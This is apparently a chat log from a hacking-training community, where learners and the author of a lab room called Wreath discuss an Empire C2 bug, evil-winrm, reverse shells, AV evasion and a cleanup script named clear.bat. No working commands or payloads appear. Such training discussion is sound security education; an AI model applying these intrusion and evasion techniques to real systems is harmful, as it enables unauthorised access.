Can you connect to a webserver on your own box?

Just curl it

yes i can connect

okay i will do

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

i got the error

Well that's a new one

Screenshot it for me?

okay

549 users are in here, and it's not even hard released yet

because it's good stuff

haha

it is good stuff ❤️

thanks muiri + james 🙂

I didn't realise Duco was in there...

Don't worry, almost done 😉

Hmmm

Does that mean you'll leave the server?

😄

Or will you stick around for Holo?

I haven't decided yet, I'm getting scared by the mental scarring that's been caused to its testers

Haha, I don't think it's gonna be that bad. It's just pretty long, from what I gather

Also, scars are cool

<gender you are attracted to> totally dig scars

How far through Wreath are you?

but mental scars aren't visible

I'm about to get to the fun stuff. Task 36 rn

Neither is buried treasure, but people still dig for ir

Oh wow.

👀

I only did a bit of the Empire stuff before Real Life came a-knocking

oof

i got to task 42

Empire didn't work for me, so gonna struggle with that later. Decided to run the .ps1 scripts through evil-winrm

empire didnt work for me either ):

Yeah I read it earlier, ran into the same issue as you. Agent pinged back at init, but then never replied to any given jobs

yeah i think it needs some fixing

There's a fix sitting in a branch of the private copy of Empire

I tested it last night -- it works. Just needs pushed

Any chance you could leave a message in pinned whenever that fix goes live?

private copy ):

Yep, will do

I'll also remove the note from the room

:)

thanks!

Gonna continue later on with AV Evasion. Really enjoying the content so far and looking forward to the last part 🙂

i just read the part about the cleanup script, that explains why when i popped into the shell an if statement randomly popped up and executed 😂

lmao

An if statement?

Just ran into the same issue as this post.

Wouldn't it be worth the idea of escaping the embedded powershell code on the site in some form to avoid AV marking the room as malicious?
Or would that be too much effort and i should just go and add an exception rule for the site?

ya that deletes the service file

Problem with that is it would make the payload, uh, not work

but im surprised that it like

showed it execute

It's an unfortunate part of learning to hack -- AV doesn't like it

It shouldn't

Do you have a screenshot?

That's running as a background process -- it's not attached to your session, so even if it was visible, you shouldn't be seeing it

one sec

do you want me to dm you or here is fine

Here's fine

That, uh, genuinely is the deletion script

yep

Did you copy it to your clipboard and paste it?

no

i was trying to clear the screen

which never works

That is so weird

OH

AHAHA

did i do something weird again 😂

what

I suspect I called that batch script clearSomething

Let me check

haha

but i didnt run it

cmd.exe is autocompleting clear

ohhh

And echo isn't off

hmm

So it's trying to run the script

i didnt click enter doe

ahahahaha, thats hilarious

weird

You typed clear and clicked enter?

wait

lemme get my reverse shell back

and ill do the same thing

gimme a sec (i killed it 😂)

This is what I get for hiding the bloody script in the PATH

Question is, can I be bothered moving it?

nope its not that

because uh

on the reverse shell

no tab auto-complete

just makes a space

What if you just type and run clear

No, it wouldn't be a shell autocomplete

oh thats it

It would be Windows filling in the most likely command

lmao

gg Muiri

*sigh*

so its me doing dumb move by doing clear on a windows box

Can I be bothered moving it?

😂

Probably not

no

Btw, pretty sure you can use "cls" in order to actually clear the screen

ya

ik

brain fart

Won't work in a reverse shell, but aye

Goddamn Windows

heheee i found it

you named it literally:

clear.bat

😂

nice

Well no flippin' wonder that was happening

windows auto-executes bat files

Talk about idiocy smh

haha

imma just move on and not break everything

yaay i found a bug 😄

Thing is, that's gonna annoy the heck out of me now

oh ):

someone else would have found it anyway

Oh, I know

It's gonna annoy me that there's a bug in it

But fixing it is a lot of effort

lmap

ahhh i just killed my shell again

Like, getting the admins to create a fresh dev network given there are about 100 people in dev network just now, messing with the security groups, or hacking the whole thing myself, then making the change, clearing up, cloning, then pushing to literally all of the 40 odd instances of the network

haha

sorry

Nah, all good 😆

100 people in dev? oof

haha

How many times has it crashed so far?

None, amazingly

We hit the max number of networks this morning. It was set to ten, so the site just started at the beginning and dumped everyone new into the dev network instead

nice

This is why we have soft releases

The max number is increased significantly now, for obvious reasons

FINALLY i got the rev shell

But there are still 100 people in my goddamn dev network

the clear.bat kept deleting my wrapper

😢

Atleast it goes to show you could probably compact networks even more in terms of how many ppl are put onto the same network.

Yeah, we genuinely could

ya

Because I reckon that even if everyone on the same network starts going ham, it should still hold up relatively well

That's how it was designed

woah the task tells me not teo disable defender

The only bottleneck is at the end -- hence the cleanup

https://tenor.com/view/explosion-explode-clouds-of-smoke-gif-17216934

disables defender

Yeah, because then no one else has any AV to practice against smh

No point in doing AV evasion is there's no AV

ill code my own av and upload it 😂

jk